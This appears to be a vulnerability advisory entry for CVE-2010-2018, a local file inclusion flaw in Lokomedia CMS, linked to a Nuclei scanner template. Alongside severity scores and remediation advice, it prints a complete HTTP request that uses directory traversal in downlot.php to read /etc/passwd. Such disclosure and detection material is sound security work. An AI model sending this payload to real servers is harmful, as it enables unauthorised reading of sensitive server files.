| Title | Lokomedia CMS - Local File Inclusion |
|---|---|
| Author | r3Y3r53 |
| Severity | High |
| Impact | Attackers can read sensitive files from the server, potentially leading to information disclosure. |
| Remediation | Update to the latest version or apply security patches to fix the vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.00334 |
| CVE ID | CVE-2010-2018 |
| CWE ID | CWE-22 |
| Tags | cve cve2010 lfi lokomedia cms vuln |
A Local File Inclusion (LFI) vulnerability exists in Lokomedia CMS. The application allows an attacker to include files on the server that should not be accessible, potentially exposing sensitive information.
GET /downlot.php?file=../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-2018.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-2018.pcap
N/AN/A